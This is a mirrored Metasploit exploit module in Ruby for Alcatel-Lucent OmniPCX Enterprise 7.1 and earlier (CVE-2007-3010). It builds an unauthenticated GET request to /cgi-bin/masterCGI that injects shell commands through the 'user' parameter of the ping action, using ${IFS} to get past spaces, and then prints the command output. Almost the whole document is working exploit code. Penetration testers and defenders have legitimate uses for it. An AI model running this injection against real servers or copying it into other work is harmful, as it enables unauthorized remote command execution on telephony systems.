CoCalc -- alcatel_omnipcx_mastercgi

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb
¹⁹⁸⁴⁷ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ManualRanking # Only interactive single commands supported
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',
16
        'Description' => %q{
17
          This module abuses a metacharacter injection vulnerability in the
18
          HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise
19
          Communication Server 7.1 and earlier. The Unified Maintenance Tool
20
          contains a 'masterCGI' binary which allows an unauthenticated attacker
21
          to execute arbitrary commands by specifying shell metacharaters as the
22
          'user' within the 'ping' action to obtain 'httpd' user access. This
23
          module only supports command line payloads, as the httpd process kills
24
          the reverse/bind shell spawn after the HTTP 200 OK response.
25
        },
26
        'Author' => [ 'aushack' ],
27
        'License' => MSF_LICENSE,
28
        'References' => [
29
          [ 'OSVDB', '40521' ],
30
          [ 'BID', '25694' ],
31
          [ 'CVE', '2007-3010' ],
32
          [ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],
33
        ],
34
        'Platform' => ['unix'],
35
        'Arch' => ARCH_CMD,
36
        'Privileged' => false,
37
        'Payload' => {
38
          'Space' => 1024,
39
          'DisableNops' => true,
40
          'Compat' =>
41
                        {
42
                          'PayloadType' => 'cmd',
43
                          'RequiredCmd' => 'generic'
44
                        }
45
        },
46
        'Targets' => [
47
          [ 'Automatic Target', {}]
48
        ],
49
        'DefaultTarget' => 0,
50
        'DisclosureDate' => '2007-09-09',
51
        'Notes' => {
52
          'Reliability' => UNKNOWN_RELIABILITY,
53
          'Stability' => UNKNOWN_STABILITY,
54
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
55
        }
56
      )
57
    )
58

59
    register_options(
60
      [
61
        Opt::RPORT(443),
62
        OptBool.new('SSL', [true, 'Use SSL', true]),
63
      ]
64
    )
65
  end
66

67
  def exploit
68
    connect
69

70
    cmd = payload.encoded.gsub(" ", '${IFS}')
71
    req =
72
      "GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\r\n" +
73
      "Host: #{rhost}\r\n\r\n"
74

75
    print_status("Sending GET request with command line payload...")
76
    sock.put(req)
77

78
    res = sock.get_once(-1, 5)
79

80
    if (res =~ /<h5>(.*)<\/h5>/smi)
81
      out = $1
82
      print_line(out.gsub(/<h5>|<\/h5>/, ''))
83
      return
84
    end
85

86
    handler
87
    disconnect
88
  end
89
end
90

91
Product

Resources

Company
